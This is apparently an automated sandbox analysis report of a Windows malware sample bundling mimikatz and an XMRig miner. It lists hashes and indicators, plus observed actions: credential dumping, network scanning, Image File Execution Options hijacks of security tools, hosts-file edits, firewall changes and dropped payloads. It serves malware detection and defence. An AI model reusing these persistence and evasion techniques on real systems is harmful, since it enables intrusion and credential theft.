Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28-08-2024 03:26
Behavioral task
behavioral1
Sample
2024-08-28_161a8220e035b4149e41fa727c3bb871_hacktools_icedid_mimikatz.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
2024-08-28_161a8220e035b4149e41fa727c3bb871_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-08-28_161a8220e035b4149e41fa727c3bb871_hacktools_icedid_mimikatz.exe
-
Size
8.3MB
-
MD5
161a8220e035b4149e41fa727c3bb871
-
SHA1
42f2b0484b527c621ad49f3db55c5d708f8acd99
-
SHA256
3938ddd57ae5db731ede188f07cee5a2362d4e3a507073a9462d05d0c2c71ff3
-
SHA512
467a028bb659e0a3199cc8785bd5f444b556eec6bb57814e4137b3f3421c04c7e4db656e44bc6c2c61f985f8a87940cc80078fffc59ab3cf9040d4517316c9e0
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3652 created 2124 3652 iacqttm.exe 38 -
Contacts a large (28756) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/984-179-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp xmrig behavioral2/memory/984-183-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp xmrig behavioral2/memory/984-201-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp xmrig behavioral2/memory/984-213-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp xmrig behavioral2/memory/984-222-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp xmrig behavioral2/memory/984-235-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp xmrig behavioral2/memory/984-250-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp xmrig behavioral2/memory/984-255-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp xmrig behavioral2/memory/984-256-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp xmrig behavioral2/memory/984-257-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp xmrig behavioral2/memory/984-260-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp xmrig behavioral2/memory/984-261-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/3956-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/3956-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x000700000002346a-6.dat mimikatz behavioral2/memory/2316-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/3228-138-0x00007FF7DF7A0000-0x00007FF7DF88E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts iacqttm.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts iacqttm.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3804 netsh.exe 2556 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 2316 iacqttm.exe 3652 iacqttm.exe 5052 wpcap.exe 1348 evlwailif.exe 3228 vfshost.exe 1412 xohudmc.exe 4988 stiattrir.exe 2428 vanpws.exe 984 rqwpbp.exe 1120 stiattrir.exe 2356 stiattrir.exe 2956 stiattrir.exe 1544 stiattrir.exe 1096 stiattrir.exe 780 stiattrir.exe 2612 stiattrir.exe 4852 stiattrir.exe 2280 stiattrir.exe 2524 stiattrir.exe 1812 stiattrir.exe 3172 iacqttm.exe 1440 stiattrir.exe 2728 stiattrir.exe 780 stiattrir.exe 528 stiattrir.exe 2016 stiattrir.exe 884 stiattrir.exe 5016 dbqlbfrvt.exe 5736 iacqttm.exe -
Loads dropped DLL 12 IoCs
pid Process 5052 wpcap.exe 5052 wpcap.exe 5052 wpcap.exe 5052 wpcap.exe 5052 wpcap.exe 5052 wpcap.exe 5052 wpcap.exe 5052 wpcap.exe 5052 wpcap.exe 1348 evlwailif.exe 1348 evlwailif.exe 1348 evlwailif.exe -
resource yara_rule behavioral2/files/0x00070000000234b1-134.dat upx behavioral2/memory/3228-135-0x00007FF7DF7A0000-0x00007FF7DF88E000-memory.dmp upx behavioral2/memory/3228-138-0x00007FF7DF7A0000-0x00007FF7DF88E000-memory.dmp upx behavioral2/files/0x00070000000234bc-145.dat upx behavioral2/memory/4988-146-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/4988-160-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/files/0x00070000000234b9-164.dat upx behavioral2/memory/984-165-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp upx behavioral2/memory/1120-172-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/2356-176-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/984-179-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp upx behavioral2/memory/2956-181-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/984-183-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp upx behavioral2/memory/1544-186-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/1096-190-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/780-194-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/2612-198-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/984-201-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp upx behavioral2/memory/4852-203-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/2280-207-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/2524-211-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/984-213-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp upx behavioral2/memory/1812-216-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/984-222-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp upx behavioral2/memory/1440-225-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/2728-229-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/780-232-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/528-234-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/984-235-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp upx behavioral2/memory/2016-237-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/884-239-0x00007FF755B60000-0x00007FF755BBB000-memory.dmp upx behavioral2/memory/984-250-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp upx behavioral2/memory/984-255-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp upx behavioral2/memory/984-256-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp upx behavioral2/memory/984-257-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp upx behavioral2/memory/984-260-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp upx behavioral2/memory/984-261-0x00007FF6F2440000-0x00007FF6F2560000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 79 ifconfig.me 80 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE iacqttm.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\vanpws.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies iacqttm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE iacqttm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE iacqttm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 iacqttm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft iacqttm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache iacqttm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData iacqttm.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\vanpws.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 iacqttm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content iacqttm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 iacqttm.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\baerflpsi\UnattendGC\specials\tucl-1.dll iacqttm.exe File created C:\Windows\ctnikqfc\svschost.xml iacqttm.exe File created C:\Windows\ctnikqfc\schoedcl.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\AppCapture64.dll iacqttm.exe File created C:\Windows\baerflpsi\ngfqdelbf\scan.bat iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\trch-1.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\svschost.exe iacqttm.exe File created C:\Windows\baerflpsi\ngfqdelbf\wpcap.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\zlib1.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\spoolsrv.exe iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\docmicfg.exe iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\schoedcl.xml iacqttm.exe File opened for modification C:\Windows\ctnikqfc\svschost.xml iacqttm.exe File opened for modification C:\Windows\ctnikqfc\vimpcsvc.xml iacqttm.exe File opened for modification C:\Windows\ctnikqfc\docmicfg.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\ssleay32.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\Shellcode.ini iacqttm.exe File opened for modification C:\Windows\ctnikqfc\schoedcl.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\tibe-2.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\vimpcsvc.exe iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\cnli-1.dll iacqttm.exe File created C:\Windows\ctnikqfc\spoolsrv.xml iacqttm.exe File opened for modification C:\Windows\baerflpsi\Corporate\log.txt cmd.exe File opened for modification C:\Windows\baerflpsi\ngfqdelbf\Result.txt dbqlbfrvt.exe File created C:\Windows\baerflpsi\UnattendGC\specials\schoedcl.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\libxml2.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\xdvl-0.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\exma-1.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\ucl.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\docmicfg.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\spoolsrv.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\docmicfg.xml iacqttm.exe File opened for modification C:\Windows\baerflpsi\ngfqdelbf\Packet.dll iacqttm.exe File opened for modification C:\Windows\ctnikqfc\spoolsrv.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\posh-0.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\AppCapture32.dll iacqttm.exe File created C:\Windows\baerflpsi\ngfqdelbf\wpcap.exe iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\libeay32.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\schoedcl.exe iacqttm.exe File created C:\Windows\baerflpsi\ngfqdelbf\Packet.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\svschost.xml iacqttm.exe File created C:\Windows\baerflpsi\ngfqdelbf\dbqlbfrvt.exe iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\coli-0.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\spoolsrv.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\vimpcsvc.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\vimpcsvc.xml iacqttm.exe File created C:\Windows\ctnikqfc\iacqttm.exe 2024-08-28_161a8220e035b4149e41fa727c3bb871_hacktools_icedid_mimikatz.exe File created C:\Windows\baerflpsi\ngfqdelbf\evlwailif.exe iacqttm.exe File created C:\Windows\ctnikqfc\docmicfg.xml iacqttm.exe File created C:\Windows\baerflpsi\Corporate\vfshost.exe iacqttm.exe File created C:\Windows\baerflpsi\ngfqdelbf\ip.txt iacqttm.exe File opened for modification C:\Windows\ctnikqfc\iacqttm.exe 2024-08-28_161a8220e035b4149e41fa727c3bb871_hacktools_icedid_mimikatz.exe File created C:\Windows\ctnikqfc\vimpcsvc.xml iacqttm.exe File created C:\Windows\baerflpsi\Corporate\mimidrv.sys iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\crli-0.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\trfo-2.dll iacqttm.exe File created C:\Windows\baerflpsi\Corporate\mimilib.dll iacqttm.exe File created C:\Windows\baerflpsi\upbdrjv\swrpwe.exe iacqttm.exe File created C:\Windows\ime\iacqttm.exe iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\svschost.xml iacqttm.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4540 sc.exe 2392 sc.exe 1360 sc.exe 4072 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iacqttm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vanpws.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-08-28_161a8220e035b4149e41fa727c3bb871_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 